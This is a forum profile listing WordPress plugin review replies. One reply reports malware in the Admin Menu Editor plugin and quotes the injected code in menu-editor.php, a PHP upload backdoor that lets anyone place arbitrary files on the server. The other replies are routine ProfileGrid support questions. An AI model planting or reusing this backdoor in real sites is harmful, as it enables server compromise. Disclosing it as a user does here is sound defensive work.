bamboovinoth
Forum Replies Created
Viewing 4 replies - 1 through 4 (of 4 total)
-
Forum: Reviews
In reply to: [Admin Menu Editor] Contains MalwareFile name: menu-editor.php
inserted lines:
<?php echo '<center><font color="Red" size="4">'; /// Script Upload By QtRoNiX FoX \\\ if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo"<center><b>Done ==> $userfile_name</b></center>"; } } else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>there where few other file too which we did not note it.
Forum: Reviews
In reply to: [ProfileGrid – User Profiles, Groups and Communities] Bug in latest versionHi Team Profilgrid
It was my misunderstanding about the shortcode. Now i understand how it works. Your plugin is really very good. we have developed a complete directory system using your plugin.
My personal suggestion: Please provide more customisation option in the plugin.
Thankyou
Vinoth Kumarnot yet
Ya but how to insert into the php code given below
` else
{
$messenger_url = $pmrequests->profile_magic_get_frontend_url(‘pm_user_login_page’,’/wp-login.php’);
$messenger_url = add_query_arg( ‘errors’,’loginrequired’, $messenger_url );
}
Viewing 4 replies - 1 through 4 (of 4 total)